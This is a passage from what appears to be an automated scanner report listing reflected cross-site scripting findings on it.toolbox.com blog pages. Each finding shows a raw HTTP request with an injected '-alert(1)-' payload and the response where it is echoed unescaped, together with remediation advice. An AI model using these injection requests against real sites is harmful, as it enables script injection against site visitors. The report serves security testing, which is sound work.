<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Making The ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43129%26c45be'-alert(1)-'37141b736fd%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b4'-alert(1)-'63cc4e8ea0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/777b4'-alert(1)-'63cc4e8ea0d HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26777b4'-alert(1)-'63cc4e8ea0d'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.64. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/ppmtoday/micracle-free-37832
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce550'-alert(1)-'0fbcb25a578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/micracle-free-37832?ce550'-alert(1)-'0fbcb25a578=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67082
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Micracle Fr ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d37832%26ce550'-alert(1)-'0fbcb25a578%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ea6'-alert(1)-'fc63506364d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/monthlyc2ea6'-alert(1)-'fc63506364d/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50697
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%26c2ea6'-alert(1)-'fc63506364d%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
3.66. http://it.toolbox.com/blogs/ppmtoday/monthly/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/monthly/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42927'-alert(1)-'e300d722da6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/monthly/?42927'-alert(1)-'e300d722da6=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%2642927'-alert(1)-'e300d722da6%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55921'-alert(1)-'f69afd006fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/55921'-alert(1)-'f69afd006fa HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2655921'-alert(1)-'f69afd006fa'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.68. http://it.toolbox.com/blogs/ppmtoday/plowing-sideways-43376 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/plowing-sideways-43376
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 923aa'-alert(1)-'5b66f60c6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/plowing-sideways-43376?923aa'-alert(1)-'5b66f60c6b0=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67973
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Plowing Sid ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43376%26923aa'-alert(1)-'5b66f60c6b0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98151'-alert(1)-'1ad1be6a8fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/98151'-alert(1)-'1ad1be6a8fa HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2698151'-alert(1)-'1ad1be6a8fa'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.70. http://it.toolbox.com/blogs/ppmtoday/roadmap-process-38207 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/roadmap-process-38207
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b720d'-alert(1)-'7c71c4dd298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/roadmap-process-38207?b720d'-alert(1)-'7c71c4dd298=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73697
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Roadmap Pro ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38207%26b720d'-alert(1)-'7c71c4dd298%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74a55'-alert(1)-'6ac004d8ab9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/74a55'-alert(1)-'6ac004d8ab9 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2674a55'-alert(1)-'6ac004d8ab9'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.72. http://it.toolbox.com/blogs/ppmtoday/saas-marches-on-38509 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/saas-marches-on-38509
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f431'-alert(1)-'136d885acd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/saas-marches-on-38509?1f431'-alert(1)-'136d885acd9=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66969
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> SaaS marche ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38509%261f431'-alert(1)-'136d885acd9%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f308c'-alert(1)-'02badb2b125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/f308c'-alert(1)-'02badb2b125 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:18 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f308c'-alert(1)-'02badb2b125'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.74. http://it.toolbox.com/blogs/ppmtoday/talent-curves-40195 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/talent-curves-40195
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dcb'-alert(1)-'2669c2ff9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/talent-curves-40195?13dcb'-alert(1)-'2669c2ff9f=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85846
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Talent Curv ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40195%2613dcb'-alert(1)-'2669c2ff9f%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56d52'-alert(1)-'064c4d5504d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/56d52'-alert(1)-'064c4d5504d HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%2656d52'-alert(1)-'064c4d5504d'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.76. http://it.toolbox.com/blogs/ppmtoday/technical-debt-revisiited-38720 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/technical-debt-revisiited-38720
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7966f'-alert(1)-'717976eea32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/technical-debt-revisiited-38720?7966f'-alert(1)-'717976eea32=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 75648
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:11 GMT
Connection: close
